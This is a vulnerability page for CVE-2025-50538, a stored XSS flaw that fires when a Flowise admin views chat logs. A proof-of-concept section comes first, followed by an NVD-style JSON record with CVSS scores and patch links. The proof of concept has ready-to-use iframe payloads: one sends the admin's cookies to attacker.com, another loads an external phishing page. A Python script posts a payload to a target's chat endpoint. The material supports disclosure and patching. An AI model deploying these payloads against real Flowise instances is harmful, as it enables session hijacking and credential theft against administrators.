CVE-2025-50538

<!-- CVE-2025-50538 PoC: Stored XSS via IFRAME in Flowise Chat Log --> <!-- Steps to reproduce: 1. Send a chat message containing the malicious IFRAME payload below 2. Wait for an admin to view the chat log in the admin panel 3. The malicious JavaScript will execute in the admin's browser context --> <!-- Malicious payload to inject via chat --> <iframe src="javascript:alert('XSS-CVE-2025-50538');document.location='https://attacker.com/steal?c='+document.cookie" width="0" height="0" frameborder="0"></iframe> <!-- Alternative payload using src attribute to load external content --> <iframe src="https://attacker.com/phishing-page" style="width:100%;height:500px;border:none;"></iframe> <!-- Python exploit script for automated testing --> import requests TARGET_URL = "https://target-flowise-instance.com" CHAT_ENDPOINT = f"{TARGET_URL}/api/v1/prediction/CHATFLOW_ID" payload = { "question": "<iframe src='javascript:alert(document.cookie)' width='0' height='0'></iframe>" } response = requests.post(CHAT_ENDPOINT, json=payload) print(f"Payload sent. Status: {response.status_code}") print("When admin views chat logs, XSS will trigger.")

{"cve": {"id": "CVE-2025-50538", "sourceIdentifier": "[email protected]", "published": "2025-10-06T02:15:40.337", "lastModified": "2025-10-07T17:03:12.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flowise before 3.0.5 allows XSS via an IFRAME element when an admin views the chat log."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.0.5", "matchCriteriaId": "BDD9A62B-1B22-4459-8EC5-4E6C0869BF26"}]}]}], "references": [{"url": "https://github.com/FlowiseAI/Flowise/pull/4905", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.5", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}